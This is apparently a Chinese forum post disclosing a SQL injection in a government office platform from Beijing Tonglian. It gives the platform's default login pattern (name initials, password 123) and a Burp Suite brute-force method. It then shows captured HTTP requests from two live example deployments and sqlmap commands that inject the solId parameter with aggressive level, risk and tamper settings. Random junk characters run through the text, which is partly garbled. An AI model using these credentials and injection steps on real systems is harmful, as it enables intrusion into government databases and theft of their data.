|
5 k, \7 _8 s- Q2 b& H ' W. Z! q. d: R2 I9 \
J. s+ k9 @1 D# F# F8 H$ K5 d; k" O0 s: Y: R
平台简介:
2 h) q2 `2 w0 N1 T9 P 1 c; e$ s6 M8 O3 W6 [5 E, c d5 ]1 |) D5 S
$ V4 m l9 Z8 E
4 {4 V! _! `5 u9 i+ Q, x5 h
$ ]( w k# z& M( j/ p6 \
0 Z" w$ o8 C& x0 f* ]3 V 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 6 F) d% r( D. w6 g& {& |% a
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
8 j* B. } y( s1 K, T) p同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!6 H$ ]! f h9 t: j K2 |
, N3 E0 F; }6 D+ D- w9 i
, d" K, |( T6 p# Q1 k8 i" H
! l5 j) ?% \7 @' Q2 {5 ~1 |- ?
$ W# h: @: F# Z/ T, _8 U$ V8 \1 r( M
2 ^9 |0 ^0 L3 e3 F0 H# |) T 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
( x2 N% Q _3 d$ J" x $ U/ V5 R. c3 o! p# j0 N
9 a2 z, G6 n( e: h
( L i* ?' l& {/ m
( o( Q2 |) ]. z ], g, e1 n7 D9 B: _6 q m. p/ I, L. O$ @- z
http://1.1.1.1:7197/cap-aco/#(案例2-)
- N% C6 D% @* l+ K" c
' W. @1 j4 t" S4 J
5 l# y! ]: ~9 d) L& X http://www.XXOO.com (案例1-官网网站)
- t+ Z; L& S1 @) p 3 W/ A# g0 C6 X- S; m; O0 D. ]+ y
: h& e7 b, p6 W2 K+ L
0 b7 N/ Y& _5 G
2 I3 \/ G: o% H E5 a
1 p( q# D: D0 }6 X+ | 漏洞详情:5 ]! p, U5 @' b
5 k! N- J& h3 Q$ T" e3 Q
. D5 w& _* U# h$ b4 h% k
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
& I" H, K/ W- W' L
6 b+ [: \% N4 _: u3 u% m- e$ R. h& \/ t7 A& V3 O
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:( B n- s4 B9 u& r. w( j
+ P# n8 Y' A% v0 D0 \1 G5 F" T# w/ N
) u2 {, n2 N, o2 o9 n" J0 y D
1 O, X" z1 O0 h# M8 R' h % i1 ?" ?+ U# p% S
) h' n, {- c5 E9 U& y
6 j/ Z; b# J- x
1 q- X& U# v& P4 F
" V, {% B% W: ]2 ?* w( C: P7 t status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
# v+ _& U& ^5 m {/ E g6 f
. g- ?3 n2 J( l0 B# P
5 F: W3 C8 m0 f$ b) G 1、案例1-官方网站
" o/ K1 e$ x- n$ o j2 ]7 j4 E
7 r; b* \7 {! n f4 Z0 S- x8 D9 m2 a! |5 ~
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
8 A. ^! f0 o9 Y. O# v
1 G' M0 U% J1 W+ Y' l9 r, h! M" F& [% W+ O; K/ B0 @6 l* s
Host: www.XXOO.com
3 j( ?( O1 u7 D: u+ ?( K5 H9 a9 P ; T6 \9 c0 S6 W2 ]
& @6 \* \0 j1 c9 l: F d7 Q
Proxy-Connection: Keep-Alive$ s# Z8 E3 X/ e/ I" M/ M1 M
6 t$ ]6 P* T( F6 Y0 b
4 `/ u1 C' B8 V" X5 e$ z% x, W
Accept: application/json, text/javascript, */*; q=0.01
- ]8 D0 G; f$ @: w
5 T7 @$ q3 Q/ M$ i' R6 _
4 {1 e% e' I7 o+ @# [ Accept-Language: zh-CN( ^3 @; a+ w) X) R4 f i" o, c
2 G; c* q* ^, b6 P! Y c
& t4 Q. Z: o+ t8 u: i) s Content-Type: application/json, W( |$ _' p+ c4 g9 [
9 G* B9 P# T# f2 u
; R/ G4 L* T" w. T" b% X User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko. g* A1 j. h. j) p
* G p) r% R j6 @0 h2 N6 k: K/ [% V+ H+ e$ j$ {
X-Requested-With: XMLHttpRequest
6 n8 E" e% H! K: L/ l3 t7 y
; {0 V2 l, {* D$ @ q4 c" A6 H' b& N9 f6 N# \
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
# f% U% g3 c6 H, r/ E \ $ b/ F; X, |/ J7 z4 c( S- B
W. T$ C+ K8 _% V
Accept-Encoding: gzip, deflate, sdch
% n" |4 T; E4 t
% p# Z% H3 d& c$ ^; @5 N' k* Y! r& [. {7 j: h0 h! k& e
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e! ^. W1 f) Z) Q3 y
; k, A- r/ C- t1 \3 q, I5 P
O, `( X- x' c2 O
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
9 s: c' |$ S+ t+ s1 B" Y
+ U9 r* A; x# m* c$ j8 q
' e- m! Q% c$ ?4 J S9 Z
/ y7 i1 b* r7 Q5 W/ n; p6 m: O+ S
7 W, o. x+ u' h. o1 b: Y# i4 s! x7 a* E: _7 C r
% m( y. O8 _+ H: S& r: x( z
; [; z: m% X; l9 K. I' R# F. @* s% _- b/ i: z8 ?& z% i
8 r$ _7 M* {! e0 i3 ^; f. d H * F( e+ V* D/ }9 `& R: }, E
& r0 }& d" Z! \+ F" r8 i ' A1 q7 s# e. o' J
+ Y% z( C) o7 t' Y5 B& N5 Q" g$ S- a4 U% e6 f
( C: J; y' }- O
# ]+ j: W5 M9 M6 v5 A
! [- n- u. |) Y* f z- @& K 2、案例2-某天河云平台
# v) Q x+ K9 w, P N" h7 s
1 n' N+ }( J' {- W# }
/ d# a" j/ N# Z GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 n( ]4 n* b* a
! [" T1 M/ G, W
2 G6 s( V8 {9 }7 {( f Host: 1.1.1.:7197
6 F* f2 ^, L+ ~, r- J
O& t T {6 i+ c( Z, _. K; N6 X. |5 }, R* N; v* V
Accept: application/json, text/javascript, */*; q=0.013 e* c2 V! M. G4 Z- {7 l
0 i& M, @# B. V( z! v7 L6 V7 B1 O: }# C' n
X-Requested-With: XMLHttpRequest
' o% ]6 \# @8 W8 N& [9 g( o
( U- u: f7 v; t5 _3 i0 S% c
# E' C6 {- \2 J P; _8 R- k! B User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0/ S1 O: A4 |% \4 ~: t
1 r2 E2 D7 d! x
# b) {5 {- i" d- t Content-Type: application/json9 x- _. B! k. ^. y1 S
1 ^' U4 M! m. x
% K- G( f# `8 H: `$ E/ E Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
E- a \( I5 d8 X# s, {6 A
6 d+ B' P1 r" K3 N/ r1 V. B/ P2 Y4 z! t$ d
Accept-Language: zh-CN,zh;q=0.8
4 |- H- z* H! Z1 s: `- Y b , X/ X9 H x- d; G
! P: Z5 n' D( M4 ^# k/ w0 A$ b
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1* g* a! R6 M# c9 c$ R. [( i
- g1 K& X4 E* b, I$ o
' K" f. I6 ]. I' t8 f3 E9 \) Y Connection: close
8 a" |! n5 |* H( C: n, ^ ; M( p& p* T6 s
/ [5 U1 [5 L/ h
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:# Q3 _9 v* z$ M1 Q T t) E8 ]6 p
, p& j& p: U% @0 J% M+ ` b1 j1 r# F y" w
0 ^8 G% ]9 @3 K7 Q( Q
* V8 A( l9 Z. `+ a3 U9 z
. h' f1 }* _& _' F" R [6 m! y2 m3 M
; T8 M. n% ^$ l b+ ?) A' u |